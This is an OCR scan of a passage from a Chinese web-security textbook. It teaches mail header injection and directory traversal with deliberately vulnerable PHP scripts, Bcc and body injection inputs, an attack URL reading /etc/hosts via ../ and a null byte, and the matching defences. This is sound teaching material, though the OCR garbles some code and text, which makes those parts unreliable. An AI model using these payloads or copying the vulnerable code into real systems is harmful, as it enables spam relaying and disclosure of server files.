发 件 人 也 非 收 件 人 ， 而 是 被 用 于 转发 第 三 方 的 邮件 (开放 转发 )。 这 样 的 服务 器 通常 会 沦落 为 发 
送 垃圾 邮件 的 工具 。 然 而 由 于 导致 这 种 问题 的 原因 并 不 是 应 用 程序 方面 的 问题 ， 因 此 这 里 只 将 其 
作为 参考 内 容 介 绍 给 读者 。 


图 4-82 ”转发 垃圾 邮件 的 情形 























垃圾 邮件 发 送 方 垃圾 邮件 般 用 户 
垃圾 邮件 
ED 
[S| 


国外 放下 放 瑟 发 的 邮件 服务 器 


图 4-82 展示 了 恶意 发 送 垃圾 邮件 的 情形 。 图 中 右 侧 的 服务 器 (A) 由 于 收 到 过 左 侧 服务 噩 
(XX ) 发 过 来 的 垃圾 邮件 ， 因 此 便 进行 了 设置 ， 拒绝 接收 X 服务 需 发 来 的 邮件 。 而 垃圾 邮件 的 发 
送 方 随后 发 现 了 允许 开放 转发 的 邮件 服务 器 ( R )， 于 是 就 利用 该 服务 需 发 送 垃圾 邮件 。 由 于 经 过 
R 服务 右 的 邮件 并 没有 被 服务 器 A 拒绝 接收 ， 因 此 服务 需 A 就 依然 能 收 到 X 发 送 的 垃圾 邮件 。 

针对 以 上 问题 ， 现 在 的 邮件 服务 器 软件 ( MTA ) 中 都 默认 不 允许 开放 转发 ， 因 此 只 要 正确 设 
置 邮 件 服务 需 就 不 会 出 现 问题 。 网 络 上 也 有 能 够 检查 邮件 服务 咒 是 否 为 开放 转发 的 网 站 ， 设 置 完 
邮件 服务 需 后 可 以 去 这 些 网 站 确认 一 下 。 








4.9.2 邮件 头 注入 漏洞 


概要 
邮件 头 注入 为 ， 当 收 件 人 (To ) 或 标题 (Subject ) 等 邮件 头 由 外 部 指定 时 ， 通 过 使 用 换行 符 
来 添加 或 更 改 邮件 头 或 正文 的 手段 。 
邮件 头 注入 漏洞 的 影响 如 下 。 
标题 、 发 件 人 或 正文 被 更 改 
被 用 来 发 送 垃圾 邮件 
被 用 来 发 送 病毒 邮件 
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防范 邮件 头 注 入 漏洞 的 方法 为 ， 使 用 专门 用 来 发 送 邮件 的 程序 库 ， 并 执行 以 下 任 一 操作 。 


邮件 头 中 不 允许 包含 外 界 传人 的 参数 
通过 校 验 不 允许 外 界 传人 的 参数 中 包含 换行 符 











邮件 头 注入 漏洞 总 览 


产生 地 点 
发 送 邮 件 功能 的 页 面 


二 = 影响 范围 


于 不 会 直接 影响 页 面 ， 而 是 对 邮件 接收 方 造成 损害 


影响 类 型 
© 被 用 来 发 送 垃 圾 邮件 、 邮 件 的 收 件 人 或 标题 、 正 文 被 自 改 、 被 用 来 发 送 带 有 病毒 的 邮件 


》 影响 程度 
4 四 =” 


用 户 参 与 程度 
不 需要 


































































































站 对 策 概要 
在 使 用 专门 用 来 发 送 邮 件 的 程序 库 的 前 提 下 ， 执 行 以 下 任 一 方法 。 
e 邮件 头 中 不 允许 包含 外 界 传 入 的 参数 

e 邮件 头 中 包含 外 界 传 入 的 参数 时 ， 要 确保 外 界 传 入 的 参数 中 不 包含 换行 符 



























































攻击 手段 与 影响 
下 面 我 们 就 来 看 一 下 邮件 头 注 入 攻击 的 方法 及 其 造成 的 影响 。 
以 下 为 用 来 发 送 邮件 的 表单 。 


代码 清单 ”/49/49-001.html 








<body> 

咨询 发 送 表单 <br> 

<form action="49-002.php" method="POST"> 

了 箱 地 址 : <input type="text" name="from"><br> 
正文 :<textarea name="body"> 








</textarea> 

<input type="submit" value=" 发 送 "> 
</form> 

</body> 





然后 ， 使 用 以 下 脚本 接收 表单 的 值 并 执行 发 送 邮件 的 处 理 。 
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代码 清单 ”/49/49-002.php 





<?php 
$from = $ POST['from']; 
$body = $8 _ POST['body']; 
mb language ('Japanese'); 
































mb_send mail ("wasbook@example.jp",，" 收 到 咨询 信件 "， 
" 收 到 了 以 下 发 来 的 咨询 ， 请 进行 处 理 。\n\n" . $body, 
"From: " . $from); 
3 
<body> 
邮件 发 送 成 功 
</body> 











mb_sengd_mail 为 支持 多 字 节 字符 的 邮件 发 送 函 数 ， 各 个 参数 分 别 为 : 收 件 人 人 地址、 标题 、 
正文 、 附 加 邮件 头 。 上 述 脚本 中 使 用 了 第 4 个 参数 ( 附加 邮件 头 ) 指定 发 件 人 (From ) 地 址 。 
关于 第 4 个 参数 ， 官 方 文档 ”中 有 如 下 记载 。 









































additional_headers 被 插入 在 邮件 头 的 末尾 。 常 用 于 增加 额外 的 头 。 通 过 使 用 换行 符 ( \n'" ) 进行 分 隔 ， 
可 以 指定 多 个 头 。 











由 此 可 见 ， 虽 然 利 用 换行 符 就 能 够 指定 多 个 邮件 头 ， 但 是 上 述 应 用 中 却 没有 考虑 到 存在 换行 
符 的 可 能 性 。 而 这 也 是 形成 安全 隐患 的 直接 原因 ， 详 情 会 在 之 后 进行 讲述 。 

首先 我 们 来 看 正常 情况 下 的 使 用 实例 。 在 表单 的 邮箱 地 址 处 填 人 “alice@example.jp”， 在 正 
文 处 填 入 “请 问 订单 编号 为 4309 的 交 货 期 限 是 什么 时 候 ”， 然 后 点 击发 送 按钮 ， 邮 件 就 会 被 发 
送 ， 如 下 图 所 示 。 


图 4-83 ”邮件 发 送 表单 


























F 中 
入 httpy/examplejp/49/49-001.html - Windows Internet Explorer | ¥ 
GO [Bp//examplejp/s9/a9-00Lhiml ~[3|x|[ eing Pp” 

帘 收 训 夫 | 息 htp//examplejp/49/49-001html | IIRO ~ 








咨询 发 送 表单 


邮箱 地 址 ，alice@examplejp 
最 区 网 号 为 4303 的 交 作 期 限 是 什么 时 “< 




















OD http://php.net/manual/zh/function.mb-send-mail.php 
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4-84 通过 表单 发 送 的 邮件 ( 正常 情况 ) 
收 到 咨询 信件 
Se 


收 到 咨询 信件 襄 


alice@example.jp 
发 给 wasbook 2013-12-01 13:48 隐藏 信 息 





和 | 下 


发 件 人 : alice@examplejp<alice@examplejp> 
收 件 人 : wasbook<wasbook@examplejp> 


时 间 : 2013 年 12 月 1 日 周 日 ) 13:48 
大 小 :4KB 


收 到 了 以 下 用 户 发 来 的 咨询 


订货 编号 为 4309 的 交 货 期 限 是 什么 时 候 














这 里 的 收 件 人 wasbook 就 相当 于 处 理 用 户 咨询 的 客服 人 员 。 
接 下 来 ， 我 们 就 来 看 一 下 如 何 针 对 此 表单 实施 攻击 。 


多 攻击 方式 1: 添加 收 件 人 

邮件 头 注 入 攻击 的 第 一 种 方式 就 是 添加 收 件 人 。 首 先 我 们 准备 了 攻击 使 用 的 表单 49-900.html。 
此 表单 与 49-001.html 大 致 相同 ， 只 是 将 邮箱 地 址 输入 框 改 成 了 能 够 输入 换行 符 的 textarea 要 素 ， 
另外 ,由 于 假设 该 网 页 要 被 托管 在 攻击 者 的 网 站 上 ， 因 此 这 里 将 form 元 素 的 action 属性 改 成 了 
URL 的 绝对 地 址 。 两 者 的 差异 如 下 所 示 ， 阴 影 部 分 即 为 不 同 点 。 


> 代码 清单 、/49/49-900.html ( 与 49-001.html 的 差异 ) 














【 略 ]】 

<form action="http://example.jp/49/49-002.php" method="POST"> 
邮箱 地 址 : <textarea name="from" rows="4" cols="30"> 
</textarea><br> 


【 略 ]】 











打开 该 表单 所 在 的 网 页 ， 然 后 输入 如 下 图 所 示 的 值 。 
会 图 4-85 通过 攻击 使 用 的 表单 发 送 邮件 


[ @ httpy//trap.example.com/49/49-900 htmi - Windows intemet Explorer [S|@@| RR] 
名 - | 丑 https//trap.example.com/49/49-900.html ~ ||X || sing pr 
宽 收 认 | 疙 http://trap.example.com/49/49-900.html 工具 (O) ~ 






































trap@trap.example.com 
Bcc: bob@example.jp 
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点 击 页 面 上 的 发 送 按钮 后 ， 邮 件 就 会 被 发 送 至 bob。 以 下 是 Becky ! 中 收 到 邮件 的 界面 。 




















上 站 党 用 文 伯 夫 

P 恩 wmmplejptwasboog trap@trap.example.com 。。 收 到 咨询 信件 
» Bl trap.example(cracked) 
> 最 examplejplalice) 


* 明 wapexampletrap) | 收 到 咨询 信件 识 








trap@trap.example.com 
发 给 wasbook 2013-12-01 13:53 隐藏 信息 


发 件 人 : trap@trap.example.com<trap@trap.example.com> 
收 件 人 : wasbook<wasbook@examplejp> 

时 间 : 2013 年 12 月 1 日 周 日 ) 13:53 

大 小 :4KB 


收 到 了 以 下 用 户 发 来 的 咨询 


电脑 大 甩卖 请 到 http://trap.example.com/ 

















虽然 客服 ( wasbook ) 也 收 到 了 同样 的 邮件 ,但 由 于 添加 bob 时 使 用 了 Becc ( 密 送 ) 的 方式 ， 
因此 客服 并 不 知道 该 邮件 也 被 发 送 给 了 bob， 而 且 很 可 能 只 是 认为 收 到 了 垃圾 邮件 而 立刻 将 其 
删除 。 

除了 Becc，49-002.php 中 还 能 够 添加 Ce 或 To ( 收 件 人 )、Reply-To 等 。 同 样 也 能 添加 Subject 
(标题 )， 但 添加 标题 后 邮件 头 中 就 有 了 两 个 Subject， 究 竟 显 示 哪 一 个 则 要 取决 于 所 使 用 的 邮件 
客户 端 。 





多 攻击 方式 2: 算 改 正文 

在 上 面 的 攻击 方式 中 ， 正 文中 还 保留 了 “ 收 到 了 以 下 用 户 发 来 的 咨询 ……” 的 信息 ， 因 此 并 
没有 达到 任意 更 改正 文 内 容 的 效果 。 下 面 我 们 就 使 用 邮件 头 注 入 攻击 来 尝试 更 改正 文 。 其 实 更 改 
正文 的 方法 很 简单 ， 只 需 在 邮箱 输入 框 的 From 地 址 中 插入 一 个 空 行 就 能 够 书写 邮件 的 正文 。 假 
设 在 49-900.html 的 邮箱 输入 框 内 输入 以 下 内 容 。 由 于 使 用 中 文 的 话 需 要 一 些 MIME 的 知识 ， 因 
此 此 处 的 例子 中 我 们 采用 了 英语 。 











trap@trap.example.com 
Bcc: bob@example.jp 


Super discount PCs 80% OFF! http://trap.example.com/ 











点 击发 送 按钮 后 ， 邮 件 客 户 端 ( Foxmail ) 中 就 会 显示 如 下 。 
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全 图 4-87 在 邮箱 输入 框 中 输入 的 内 容 出 现在 了 正文 中 


Foxmail 





BQ 搜索 邮件 


上 口 党 用 文件 夫 9 119| 发 和 4 人 
Y 今天 (1 动 
trap@trap.example.com ” 收 到 咨询 信件 





上 时 examplejptwasboo 央 
上 a trap.example(cracked) 
上 时 examplejplalice) 


* 最 trapexamplettrap) 收 到 咨询 信件 襄 


时 examplejptbob) trap@trap.example.com 
发 给 wasbook 2013-12-01 14:01 隐藏 信息 








发 件 人 : trap@trap .examplecom<trap@trapexamplecom> 
收 件 人 : wasbook<wasbook@examplejp> 

时 间 : 2013 年 12 月 1 日 同日) 14:01 

大 小 :3 KB 


Super discount PCs 80% OFF! http://trap.example.com/ 


Mime-Version: 1.0 
Context-Type: text/plain; charset=ISO-2022-JP 
Content-Transfer-Encoding: 7bit 


收 到 了 以 下 用 户 发 来 的 咨询 




















可 以 看 到 添加 在 From 字段 之 后 的 消息 出 现在 了 正文 中 。 
然而 这 样 的 邮件 正文 会 让 人 感觉 很 可 疑 ， 因 此 在 实际 的 攻击 中 ,攻击 者 会 使 用 大 量 的 空 行 来 
迷惑 用 户 , 或 者 使 用 MIME 来 隐藏 后 面 的 正文 消息 。 另 外 还 能 够 添加 附件 。 下 面 我 们 就 来 简单 
地 介绍 一 下 这 种 方法 。 


通过 邮件 头 注入 攻击 添加 附件 

上 面 说 到 通过 邮件 头 注 入 攻击 还 能 够 添加 附件 。 下 图 即 为 使 用 49-002.php 将 恶意 软件 ( 实 
际 为 防 病毒 软件 的 测试 用 文件 ?了 ) 以 附件 的 形式 添加 到 邮件 中 的 结果 。 可 以 看 出 ,正文 中 使 用 了 中 
文 ， 原来 的 正文 则 被 很 好 地 隐藏 了 起 来 。 


全 图 4-88 通过 邮件 头 注入 攻击 能 够 添加 附件 








BQ 搜索 邮件 


上 站 党 用 文 从 ENE EL 
Y 4 天 Gd 动 
@ trap@trap.example.com 收 到 咨询 信件 





时 examplejptwasboog 


加 曹 入 条 

日 B 发 闫 闻 件 

日 Be 邮件 

沿 垃圾 邮件 
> 局 trap.example(cracked) 
bP 局 examplejp(alice) 








trap@trap.example.com 
居 wasbook 2013-12-01 14:06 隐藏 信息 


发 件 人 : trap@trap examplecom<trap@trap examplecom> 
收 件 人 : wasbook<wasbook@examplejp> 


empire 时 间 : 2013 年 12 月 1 日 周 日 14:06 


》 忆 examplejp(bob) 大 小 :3 KB 


国 eicarcom (601 B) 
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攻击 的 奥秘 在 于 恶意 利用 了 MIME 的 multipart/mixed 形式 。 读 者 们 只 需 在 安全 隐患 试验 环 
境 中 的 49-901.html 中 点 击发 送 按钮 就 能 够 亲自 体验 这 一 攻击 手段 。 此 外 ， 在 http://example.jp/49 
的 菜单 中 选择 “5. 49-901: 咨询 表单 (通过 邮件 头 注入 攻击 添加 附件 ”， 也 能 够 轻松 地 打开 该 
页 面 。 

但 是 ， 如 果 计 算 机 中 安装 了 防 病毒 软件 ， 附 件 就 有 可 能 被 删除 或 被 蔡 换 为 别 的 文件 。 上 面 的 
截图 是 暂时 关闭 了 防 病毒 软件 后 取得 的 。 








安全 隐患 的 产生 原因 
要 理解 邮件 头 注入 漏洞 产生 的 原因 ， 就 必须 要 知道 邮件 的 消息 格式 。 邮 件 的 消息 格式 与 
HTTP 相似 ， 消 息 头 与 正文 用 空 行 相隔 。 图 4-89 即 为 邮件 消息 的 示例 。 


图 4-89 邮件 的 消息 格式 














消息 头 ” To: wasbook@example.jp 

Subject: =?ISO-2022-JP?B?GyRCTGQOKkUD1InJG8kOyQsJCIPKEI=?= 
=?ISO-2022-JP?B?GYyRCUJGokXiQ3UJD8bKEI=?= 

From: alice@example.jp 

Content-Type: text/plain; charset=ISO-2022-JP 





空 和 











正文 收 到 了 以 下 用 户 发 来 的 咨询 ， 请 进行 处 理 
请 问 发 货 编号 为 4309 的 交 货 期 限 是 什么 时 候 












































To 为 收 件 人 ，Subject 为 标题 ，From 为 发 件 人 的 邮箱 地 址 。 发 送 邮 件 时 经 常 使 用 的 sendmail 
命令 以 及 多 数 发 送 邮件 程序 库 都 会 从 邮件 的 消息 头 中 取得 发 送 目标 的 邮箱 地 址 。 

邮件 头 注 入 漏洞 产生 的 主要 原因 与 HTTP 消息 头 注 入 漏洞 相似 。 我 们 知道 ， 消 息 头 中 各 字段 
以 换行 符 隔 开 ， 因 此 ， 如 果 能 够 在 外 界 传人 的 参数 中 插入 换行 符 ， 那 么 就 可 以 添加 新 的 消息 头 。 
下 图 为 在 From 消息 头 后 添加 Bcc 消息 头 的 例子 。 


图 4-90 添加 Bcc 消息 头 


预想 的 消息 头 | From: alice@example.jp 























攻击 模式 From: alice@example.jp 
Bcc: bob@example.jp 添加 的 消息 头 








同样 ， 使 用 该 方法 也 能 够 添加 正文 。 





QD Subject 消息 头 占 了 2 行 是 因为 使 用 了 “ 续 行 "。 续 行 的 第 2 行 以 后 的 行 以 空格 开头 。 收 件 人 的 邮箱 地 址 很 长 的 时 候 也 
会 用 到 续 行 。 其 实 HTTP 中 也 定义 了 续 行 ， 但 平时 几乎 不 会 使 用 。 

@) sendmail 命令 在 默认 情况 下 会 以 命令 参数 的 形式 来 指定 收 件 人 。 而 指定 了 -t 选项 后 ， 收 件 人 的 邮箱 地 址 就 可 以 从 邮 
件 消息 的 To、Cc、Bcc 中 取得 。 
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4-91 添加 正文 





预想 的 消息 头 | From: alice@example.jp 





攻击 模式 From: alice@example.jp 




















电脑 大 甩卖 | 添加 的 正文 




















由 此 可 见 ， 换 行 符 在 邮件 的 消息 头 中 有 着 特殊 的 意义 ， 如 果 应 用 中 没有 对 换行 符 做 相应 的 处 
理 ， 就 会 给 外 界 以 添加 或 更 改 消 息 头 和 正文 的 可 乘 之 机 。 而 这 也 是 邮件 头 注 入 漏洞 产生 的 原因 。 
尤其 是 在 CGI 程序 中 发 送 邮 件 时 ， 以 前 普遍 采用 自己 生成 邮件 消息 并 使 用 sendmail 命令 发 送 的 
方法 ， 然 而 使 用 这 种 方法 生成 邮件 消息 时 是 极 易 被 混入 安全 隐患 的 。 














对 策 = 
为 了 消除 邮件 头 注 入 隐患 ， 首 先 就 要 停止 使 用 sendmail 命令 来 发 送 邮 件 ， 而 是 使 用 专门 的 
程序 库 [e) 
使 用 专门 的 程序 库 来 发 送 邮件 
在 此 基础 上 ， 推 荐 再 配合 采用 以 下 任 一 方法 。 
不 将 外 界 传人 的 参数 包含 在 邮件 头 中 
发 送 邮件 时 确保 外 界 传人 的 参数 中 不 包含 换行 符 
下 面 我 们 就 来 依次 讲解 上 述 对 策 。 
令 使 用 专门 的 程序 库 来 发 送 邮 件 


发 送 邮 件 时 ， 相 比 于 自己 生成 邮件 消息 ,使 用 专门 的 程序 库 更 为 安全 。 使 用 程序 库 有 以 下 3 
个 优点 。 


使 用 sendmail 命令 发 送 邮 件 时 ， 邮 件 消息 的 生成 全 部 由 应 用 程序 方面 负责 ， 容 易 引 入 
漏洞 
调用 sendmail 命令 时 容易 混入 OS 命令 注入 漏洞 (参考 4.11 节 ) 
理论 上 专门 的 程序 库 中 已 经 做 好 了 邮件 头 注 入 漏洞 的 防范 策略 

但 是 , 由 于 不 少 专门 用 于 发 送 邮件 的 程序 库 中 也 被 曝 出 了 邮件 头 注入 漏洞 ", 因此 , 除了 使 用 
专门 的 程序 库 之 外 ， 还 需要 配合 执行 先前 列 出 的 两 个 对 策 中 的 任意 一 个 。 


人 不 将 外 界 传 入 的 参数 包含 在 邮件 头 中 
只 要 确保 邮件 头 中 不 包含 外 界 传人 的 参数 ， 就 能 够 彻底 杜绝 邮件 头 注 和 漏洞。 因此， 在 应 对 
邮件 头 注入 漏洞 时 ， 应 该 首先 考虑 这 一 措施 。 


四 ”关于 发 送 邮件 时 使 用 的 程序 库 中 的 邮件 头 注入 漏洞 的 情况 ， 可 以 参考 估 名 木 智 贵 的 在 线 文档 “Security of WebAppli&iMail” [2]。 
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比如 在 49-002.php 中 ， 用 户 输入 的 邮箱 地 址 被 设置 为 了 From 邮件 头 ， 但 由 于 该 邮件 的 发 送 
目标 是 客服 管理 员 ， 因 此 ， 将 From 消息 头 固定 并 在 正文 中 显示 用 户 的 邮箱 地 址 ， 也 同样 能 够 达 
到 此 表单 的 目的 。 

由 此 可 见 ， 如 果 可 能 的 话 ， 最 好 不 要 在 邮件 头 中 包含 外 界 传人 的 参数 。 


人 发 送 邮件 时 确保 外 界 传 入 的 参数 中 不 包含 换行 符 

如 果 邮 箱 地 址 或 标题 等 允许 包含 换行 符 ， 那 么 就 可 能 会 被 添加 新 的 邮件 头 或 正文 ， 从 而 导致 
邮件 头 注入 漏洞 的 产生 。 由 于 邮箱 地 址 或 标题 中 本 身 就 不 允许 包含 换行 符 ， 所 以 只 需 在 发 送 邮件 
时 对 换行 符 进 行 校 验 ， 就 可 以 从 根本 上 防范 邮件 头 注 和 漏洞。 
具体 方法 为 ， 不 直接 调用 mp_seng_mail 这 类 发 送 邮件 时 使 用 的 程序 库 函 数 ， 而 是 编写 专 
门 用 于 发 送 邮 件 的 包装 函数 ”, 并 在 包装 函数 中 校 验 换行 符 。 另 外 , 在 框架 提供 的 发 送 邮件 功能 
诅 入 校 验 换行 符 的 处 理 也 是 有 效 的 。 


多 邮件 头 注入 的 辅助 性 对 策 

正如 前 面 所 说 的 那样 ， 邮 件 头 中 设置 的 邮箱 地 址 和 标题 中 本 来 就 不 应 该 包含 换行 符 ， 而 这 也 
应 该 被 包含 在 输入 值 校 验 的 范围 之 内 。 因 此 ， 只 要 进行 了 妥善 的 输入 校 验 ， 就 会 有 助 于 防范 邮件 
头 注入 漏洞 。 
























































信 校 验 邮 箱 地 址 

虽然 RFC53222 中 规定 了 邮箱 地 址 的 格式 , 但 是 RFC 中 的 规定 相当 复杂 , 并非 所 有 的 邮件 服 
务 器 、 邮 件 客户 端 和 Web 邮箱 服务 都 完全 支持 RFC 中 的 规定 。 因 此 ， 只 要 在 各 个 项 目 需求 中 确 
定 邮 箱 地 址 的 格式 ， 然 后 再 在 程序 的 输入 校 验 中 检查 是 否 符合 该 格式 即 可 。 























依 校 验 标题 

由 于 标题 ( Subject 消息 头 ) 中 没有 格式 和 字符 种 类 的 限制 ， 因 此 只 要 使 用 4.2 节 中 讲述 的 
“与 控制 字符 以 外 的 字符 相 匹配 ”的 正则 表达 式 即 可 。 换 行 符 也 是 控制 字符 的 一 种 ， 因 此 也 能 被 
校 验 到 。 比 如 ， 以 下 例子 中 的 脚本 就 是 为 了 确保 不 包含 控制 字符 并 将 字符 数 限制 在 1~60。 但 其 
前 提 为 内 部 字符 编码 为 UTF-8。 字 符 编码 不 是 UTF-8 时 请 使 用 mb_ereg 函数 。 




















if (preg match('/\A[[:^cntrl:]]{1,60}\z/u', $subject) == 0) { 
die (' 请 输入 长 度 为 1-60 字符 的 标题 ' ) ; 


} 














QD 包装 函数 是 指 ， 为 了 更 方便 地 使 用 函数 或 功能 而 编写 的 简单 的 函数 。 由 于 是 在 原 函 数 外 包 庄 了 一 层 使 其 更 容易 使 用 ， 
因此 被 称 为 包装 函数 。 
@ http:/tools.ietf org/html/rfc5322 
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总 结 


本 节 讲 述 了 与 邮件 发 送 功 能 相关 的 安全 隐患 。 

由 于 多 数 反馈 表单 中 都 会 使 用 发 送 邮 件 的 功能 ， 因 此 即便 是 几乎 没有 什么 功能 的 应 用 主页 也 
频频 发 生 与 邮件 发 送 功 能 相关 的 安全 隐患 。 刀 外 ,在 网 上 搜索 发 送 邮件 的 编程 方法 时 ， 很 容易 搜 
到 使 用 sendmail 命令 这 类 过 时 的 方法 ， 从 而 也 极 易 引入 安全 隐患 。 

因此 ， 为 了 避免 引入 安全 隐患 ， 学 习 Web 应 用 中 发 送 邮 件 的 正确 方法 至 关 重 要 。 


























继续 深入 学 习 

为 了 深入 理解 与 发 送 邮件 相关 的 安全 隐患 ， 对 邮件 协议 (特别 是 SMTP ) 的 理解 不 可 或 缺 。 
而 通过 阅读 相关 的 入 门 书 等 书籍 来 学 习 邮 件 协议 ， 对 解答 乱码 等 问题 也 很 有 帮助 。 

这 里 向 读者 们 推荐 网 野 卫 三 所 著 的 《3 分 钟 HTTP& 邮件 协议 基础 讲座 》[3] 一 书 ， 此 书 同时 
也 可 以 被 作为 HTTP 的 入 门 书 使 用 。 

邮件 程序 库 中 使 用 SMTP 与 邮件 服务 器 通信 的 情况 下 ， 可 能 还 会 发 生 SMTP 命令 注入 攻击 。 
SMTP 命令 注入 攻击 的 实例 请 参考 NTT Communications 公司 发 表 的 《关于 .NET Framework 中 的 
SMTP Command Injection 江 1] 一 文 。 在 .NET Framework 中 发 送 邮 件 时 可 能 会 需要 用 到 文章 中 
到 的 防范 策略 。 
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4.10 ”文件 处 理 相关 的 问题 


Web 应 用 会 通过 多 种 多 样 的 形式 和 文件 打交道 。 而 本 方 的 主题 就 是 处 理 文件 时 可 能 产生 的 
安全 隐患 。 

在 有 些 Web 应 用 中 ， 外 界 能 够 通过 传人 参数 的 形式 来 指定 服务 器 中 的 文件 名 。 比 如 由 外 界 
参数 来 指定 模板 文件 的 情况 。 这 样 的 Web 应 用 可 能 会 招致 以 下 攻击 。 


非法 访问 Web 服务 器 内 的 文件 (日 录 遍 历 ) 
调用 OS 命令 (OS 命令 注入 ) 


其 中 ,目录 遍历 漏洞 将 在 4.10.1 节 中 讲述 。 此 外 ,通过 目录 遍历 攻击 有 时 还 能 够 执行 OS 命 
令 , 不 过 这 里 我 们 将 此 问题 归 为 OS 命令 注入 的 范畴 并 在 4.11 节 中 讲述 。 

另外 ， 如 果 数 据 文件 或 配置 文件 被 保存 在 公开 目录 中 ， 就 可 能 会 被 外 界 浏 览 而 造成 信息 
漏 。 详 情 将 在 4.10.2 节 中 讲述 。 














4.10.1 目录 遍历 漏洞 


概要 


Web 应 用 中 人 允许 外 界 以 参数 的 形式 来 指定 服务 器 上 的 文件 名 时 ， 如 果 没 有 对 文件 名 进行 充 
分 的 校 验 ， 就 可 能 会 造成 意料 之 外 的 问题 ， 比 如 文件 被 浏览 、 算 改 或 删除 。 该 安全 隐患 被 称 为 目 
录 过 历 漏 洞 。 

目录 遍历 漏洞 会 造成 以 下 影响 。 

浏览 Web 服务 需 中 的 文件 

泄漏 重要 信息 
算 改 或 删除 Web 服务 器 中 的 文件 
算 改 网 页 内 容 ， 散 布 谣言 或 恶意 诽谤 他 人 
布下 圈套 将 用 户 诱导 至 恶意 网 站 
删除 脚本 文件 或 配置 文件 导致 服务 絮 宕 机 
通过 算 改 脚本 文件 从 而 在 服务 右上 执行 任意 脚本 


目录 遍历 漏洞 的 防范 策略 如 下 ， 执 行 其 中 一 项 即 可 。 
避免 由 外 界 指定 文件 名 

文件 名 中 不 允许 包含 目录 名 

限定 文件 名 中 仅 包含 字母 和 数字 
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目录 遍历 漏洞 总 览 
产生 地 点 
能 够 由 外 界 指定 文件 名 的 页 面 


二 = 影响 范围 


[到 所 有 页 面 


~ 















































© 影响 类 型 
泄漏 隐私 信息 、 纂 改 或 删除 信息 、 执 行 任意 脚本 、 使 应 用 停止 服务 


CA 影响 程度 
三 


用 户 参 与 程度 
不 需要 





























门 | 对 策 概要 
和 执行 以 下 任 一 方法 6 
。 避免 由 外 界 指定 文件 名 
。 文件 名 中 不 允许 包含 目录 名 
。 限定 文件 名 中 仅 包 含 字母 和 数字 


















































攻击 手段 与 影响 
下 面 我 们 就 来 看 一 下 目录 遍历 攻击 的 手段 与 影响 。 
以 下 是 能 够 使 用 template= 的 形式 来 指定 页 面 模板 文件 的 脚本 。 








代码 清单 ”/4a/4a-001.php 





<?php 
define('TMPLDIR', '/var/www/4a/tmpl/'); 
$stmpl = $_GET['template']; 

Es 

<body> 

<?php readfile(TMPLDIR . S$tmpl . '.html'); ?> 

菜单 ( 以 下 略 ) 

</body> 

















常量 TMPLDIR 指定 的 是 存放 模板 文件 的 目录 名 。 模 板 文件 名 由 查询 字符 串 中 的 template 
指定 ， 并 被 赋值 到 变量 stmpl 中 。 上 脚本 使 用 readfile 函数 读 取 模板 文件 ， 然 后 将 其 原封 不 动 
地 放 到 响应 信息 中 。 

下 面 为 模板 文件 的 示例 。 





4.10 文件 处 理 相关 的 问题 | 199 


代码 清单 ”/4a/tmpl/spring.html 





你 好 ， 已 经 是 春天 了 呢 。<br> 








通过 以 下 URL 执行 脚本 就 能 够 读 取 上 述 模板 文件 。 








http://example.jp/4a/4a-001.php?template=spring 








图 4-92 示例 脚本 的 执行 例 


阁 httpy//examplejp/4a/4a-001.php?template=spring - Windows Internet Explorer [Esme 








器 [Btp//examplejp/4a/4a-00Lphpriemplate=spring | |X |[S sng 
言 收藏 夫 





| 








| 臣 http://examplejp/4a/4a-001.php?template=... 加 | 








I 上 (0O) ~ 





你 好 ， 已 经 是 春天 了 呢 。 
菜单 (以 下 上 略 ) 











此 时 ,脚本 中 被 拼接 成 的 文件 名 如 下 所 示 。 
正常 情况 下 拼接 成 的 文件 名 





/var/www/4a/tmpl/spring.html 














接 下 来 我 们 就 来 看 一 下 如 何 对 其 展开 攻击 。 使 用 以 下 URL 执行 示例 脚本 。 





http://example.jp/4a/4a-001.php?template=../../../../etc/hosts%00 








图 4-93 显示 了 Linux 的 配置 文件 内 容 


[g http://examplejp/4a/4a-001.php?template=.././../-/etc/hosts%00 - Windows Interne..| 品 | 回 | 器 
ODO- 加 httpy/examplejp/4a/4a-001.phpztemplate=-/-/./ “| 人 














x | ang 27| 











帘 收 天 | 态 htpy/examplejp/4a/49-001php?template=… | IRo 





127.0.0.1 localhost 127.0.0.1 wasbook # The following lines are desirable for IPv6 capable 
hosts -1 localhost ip6-localhost ip6-loopback fe00-0 ip6-localnet ff00-0 ip6-mcastprefix fF02-1 
ip6-allnodes 人 2-2 ip6-allrouters 菜单 〈 以 下 略 ) 

















页 面 中 显示 的 为 Linux 的 配置 文件 /etc/hosts 的 内 容 。 也 就 是 说 ， 通 过 目录 遍历 攻击 能 够 浏 
览 操作 系统 的 配置 文件 。 此 时 ， 脚 本 内 被 拼接 成 的 文件 名 如 下 所 示 。 其 中 [NUL] 为 空 字 节 ( 字 
符 编码 为 0 的 字符 ) "。 


攻击 时 拼接 成 的 文件 名 











/var/www/4a/tmpl/../../../../etc/hosts [NUL] .html 








四 正如 1.4.2 节 中 介绍 的 那样 ， 空 字 节 在 C 语言 中 表示 字符 串 的 结束 。 
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由 于 ../ 表示 上 层 目录 ， 空 字 节 又 会 迫使 文件 名 字符 串 结 束 ， 因 此 ， 将 此 文件 名 标准 化 后 ， 
实际 被 访问 的 文件 名 即 为 如 下 内 容 。 


标准 化 后 的 文件 名 





/etc/hosts 














因此 ， 最 终 页 面 显示 的 是 etc/hosts 文件 的 内 容 。 

由 此 可 见 , 一 旦 Web 应 用 中 存在 目录 过 历 漏洞 ， 攻 击 者 就 能 够 随意 访问 服务 右上 的 任何 文件 。 

不 过 上 面 的 例子 仅仅 展示 了 读 取 文件 的 情况 ， 其 实 ， 依 据 应 用 的 内 部 实现 ， 有 时 还 能 够 进行 
履 盖 或 删除 文件 等 操作 ， 从 而 造成 数据 被 算 改 。 

此 外 ， 一 旦 攻击 者 能 够 通过 目录 遍历 来 编辑 PHP 等 脚本 文件 ， 就 能 将 编辑 后 的 脚本 在 Web 
服务 器 上 运行 ， 从 而 也 就 相当 于 能 够 执行 任意 脚本 。 这 时 攻击 造成 的 影响 与 OS 命令 注入 (参考 
4.11 节 ) 相同 ， 即 能 使 计算 机 下 载 恶 意 程序 或 对 系统 进行 非法 操作 等 。 
































专栏 : 从 脚本 源码 开始 的 一 连 串 的 信息 泄漏 COLUMN 
通过 目录 遍历 攻击 访问 Web 服务 器 上 的 文件 时 需要 知道 文件 名 。 虽 然 /etc/hosts 是 操作 系 



































